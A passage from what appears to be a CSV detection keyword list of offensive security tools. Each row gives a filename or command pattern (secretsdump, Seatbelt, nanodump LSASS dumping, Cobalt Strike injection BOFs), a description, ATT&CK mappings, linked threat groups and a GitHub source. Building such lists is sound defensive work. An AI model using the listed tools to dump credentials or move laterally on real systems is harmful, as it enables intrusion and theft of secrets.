T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,1,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*scshellbofx64*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,1,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*scumjr*dirtycow-vdso*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/timwr/CVE-2016-5195,1,1,N/A,N/A,10,935,404,2021-02-03T16:03:40Z,2016-10-21T11:19:21Z -*search_for_secrets(*,offensive_tool_keyword,SeeYouCM-Thief,Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials,T1110.001 - T1005 - T1071.001,TA0001 - TA0011 - TA0005,N/A,N/A,Discovery,https://github.com/trustedsec/SeeYouCM-Thief,1,0,N/A,9,2,149,30,2023-05-11T01:04:36Z,2022-01-14T20:12:25Z -*Search-cpassword*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*SearchOutlook.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*searchsploit -m *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*searchsploit -x *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*searchsploit_rc*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*seatbelt -*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*seatbelt all*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Seatbelt* -group=all*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,N/A,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*Seatbelt.exe*,offensive_tool_keyword,cobaltstrike,Erebus CobaltStrike post penetration testing plugin,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DeEpinGh0st/Erebus,1,1,N/A,10,10,1356,214,2021-10-28T06:20:51Z,2019-09-26T09:32:00Z -*Seatbelt.exe*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,1,N/A,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*Seatbelt.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SeatbeltNet*.exe*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,1,N/A,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*secgroundzero*,offensive_tool_keyword,Github Username,github username hosting exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/secgroundzero,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*sec-inject *,offensive_tool_keyword,cobaltstrike,Section Mapping Process Injection (secinject): Cobalt Strike BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/apokryptein/secinject,1,0,N/A,10,10,79,20,2022-01-07T21:09:32Z,2021-09-05T01:17:47Z -*secinject.cna*,offensive_tool_keyword,cobaltstrike,Section Mapping Process Injection (secinject): Cobalt Strike BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/apokryptein/secinject,1,1,N/A,10,10,79,20,2022-01-07T21:09:32Z,2021-09-05T01:17:47Z -*secinject.git*,offensive_tool_keyword,cobaltstrike,Section Mapping Process Injection (secinject): Cobalt Strike BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/apokryptein/secinject,1,1,N/A,10,10,79,20,2022-01-07T21:09:32Z,2021-09-05T01:17:47Z -*secinject.x64*,offensive_tool_keyword,cobaltstrike,Section Mapping Process Injection (secinject): Cobalt Strike BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/apokryptein/secinject,1,1,N/A,10,10,79,20,2022-01-07T21:09:32Z,2021-09-05T01:17:47Z -*secinject.x86*,offensive_tool_keyword,cobaltstrike,Section Mapping Process Injection (secinject): Cobalt Strike BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/apokryptein/secinject,1,1,N/A,10,10,79,20,2022-01-07T21:09:32Z,2021-09-05T01:17:47Z -*secinject/src*,offensive_tool_keyword,cobaltstrike,Section Mapping Process Injection (secinject): Cobalt Strike BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/apokryptein/secinject,1,1,N/A,10,10,79,20,2022-01-07T21:09:32Z,2021-09-05T01:17:47Z -*SecLists*,offensive_tool_keyword,SecLists,SecLists is the security testers companion. Its a collection of multiple types of lists used during security assessments. collected in one place. List types include usernames. passwords. URLs. sensitive data patterns. fuzzing payloads. web shells. and many more. The goal is to enable a security tester to pull this repository onto a new testing box and have access to every type of list that may be needed.,T1210.002 - T1212.001 - T1589.001,TA0040 - TA0006 - TA0001,N/A,N/A,Exploitation tools,https://github.com/danielmiessler/SecLists,1,1,N/A,N/A,10,49197,23242,2023-09-23T07:17:59Z,2012-02-19T01:30:18Z -*--seclogon-leak-local*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*--seclogon-leak-remote*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*secrary*,offensive_tool_keyword,Github Username,github username hosting process injection codes ,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/secrary,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*secredump.exe*,offensive_tool_keyword,BackupOperatorToDA,From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller,T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/mpgn/BackupOperatorToDA,1,1,N/A,10,4,335,48,2022-10-05T07:29:46Z,2022-02-15T20:51:46Z -*secret_fragment_exploit.py */_fragment*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*SecretFinder.py*,offensive_tool_keyword,secretfinder,SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files,T1083 - T1081 - T1113,TA0003 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/m4ll0k/SecretFinder,1,1,N/A,N/A,10,1524,324,2023-06-13T00:49:58Z,2020-06-08T10:50:12Z -*SecretFinder-master.zip*,offensive_tool_keyword,secretfinder,SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files,T1083 - T1081 - T1113,TA0003 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/m4ll0k/SecretFinder,1,1,N/A,N/A,10,1524,324,2023-06-13T00:49:58Z,2020-06-08T10:50:12Z -*secrets/secrets_manager/secrets.txt*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*secrets_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*secrets_dump_dcsync*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*secretsdump *--silent*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*secretsdump -sam *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*secretsdump*,offensive_tool_keyword,POC,Zerologon CVE exploitation (could be other malicious tools too),T1210 - T1068,TA0001,N/A,N/A,Exploitation tools,https://github.com/risksense/zerologon,1,1,N/A,N/A,6,555,144,2020-10-15T18:31:15Z,2020-09-14T19:19:07Z -*secretsdump.*.pyc*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*secretsdump.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*secretsdump.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*secretsdump.py*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*secretsdump.py*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - 